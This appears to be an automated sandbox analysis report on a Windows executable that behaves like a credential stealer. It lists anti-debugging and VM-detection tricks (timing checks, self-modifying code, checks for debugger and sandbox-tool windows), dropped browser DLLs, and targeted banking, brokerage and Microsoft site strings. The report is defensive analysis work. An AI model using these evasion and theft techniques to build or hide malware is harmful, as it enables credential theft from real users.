Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D04FD second address: 7D0503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D0503 second address: 7D051A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F36EC8543CEh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D051A second address: 7D0520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D6057 second address: 7D605F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0476 second address: 7E0494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F36ED361E08h 0x00000014 push edx 0x00000015 jne 00007F36ED361E06h 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0494 second address: 7E04A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F36EC8543C6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3F15 second address: 7E3F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3F19 second address: 7E3F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3BB4 second address: 7F3BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3BBD second address: 7F3BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F36EC8543CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3BCA second address: 7F3BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F36ED361E0Fh 0x0000000f jns 00007F36ED361E06h 0x00000015 popad 0x00000016 jmp 00007F36ED361E11h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 801E6F second address: 801E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805651 second address: 805655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805655 second address: 805659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8057E0 second address: 8057E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8057E4 second address: 80580E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D7h 0x00000007 jmp 00007F36EC8543CBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805B13 second address: 805B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805B1C second address: 805B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805B22 second address: 805B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805E3E second address: 805E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F36EC8543CFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805E54 second address: 805E5E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F36ED361E06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806190 second address: 806195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806195 second address: 8061A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F36ED361E06h 0x0000000a jno 00007F36ED361E06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8062C1 second address: 8062D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnc 00007F36EC8543C6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8062D1 second address: 8062F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F36ED361E0Ah 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8062F4 second address: 806301 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80645B second address: 80645F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80645F second address: 80647E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36EC8543D7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80647E second address: 806482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806482 second address: 8064B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F36EC8543D4h 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F36EC8543D2h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8064B5 second address: 8064BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8064BF second address: 8064CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F36EC8543C6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80932D second address: 809337 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C392 second address: 80C3A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36EC8543D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C3A9 second address: 80C3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007F36ED361E06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C3BA second address: 80C3E8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36EC8543C6h 0x00000008 jmp 00007F36EC8543D8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push edx 0x00000013 jng 00007F36EC8543C6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80DE05 second address: 80DE0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE02FD second address: 4CE0302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0302 second address: 4CE0308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0308 second address: 4CE0328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F36EC8543D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0328 second address: 4CE032F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, A8h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03DC second address: 4CE03F7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F36EC8543CCh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03F7 second address: 4CE03FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03FB second address: 4CE0401 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0401 second address: 4CE0437 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36ED361E12h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F36ED361E0Dh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ebx, 56095E4Eh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7320CF second address: 73210A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36EC8543CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F36EC8543CEh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F36EC8543D5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732478 second address: 73247E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73247E second address: 732495 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F36EC8543C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F36EC8543C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C1B second address: 4CE0C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C35 second address: 4CE0C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36EC8543CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C47 second address: 4CE0C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e pushfd 0x0000000f jmp 00007F36ED361E15h 0x00000014 or eax, 1E014216h 0x0000001a jmp 00007F36ED361E11h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C84 second address: 4CE0CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 call 00007F36EC8543D3h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F36EC8543D2h 0x00000018 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 581B5F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 57F4E6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 74B54A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7ADD29 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00334910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00334910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0032DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0032E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0032BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0032F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00333EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00333EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003216D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003338B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0032ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00334570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00334570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0032DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00321160 GetSystemInfo,ExitProcess,

0_2_00321160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2359595891.0000000000703000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: CBKJEGCB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: CBKJEGCB.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: CBKJEGCB.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: CBKJEGCB.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: CBKJEGCB.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: CBKJEGCB.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: CBKJEGCB.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: CBKJEGCB.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: CBKJEGCB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: CBKJEGCB.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: CBKJEGCB.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: CBKJEGCB.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: CBKJEGCB.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000002.2360250459.0000000000F51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: file.exe, 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware^
Source: CBKJEGCB.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: CBKJEGCB.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: CBKJEGCB.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2359595891.0000000000703000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CBKJEGCB.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: CBKJEGCB.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

0_2_6C6B5FF0

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

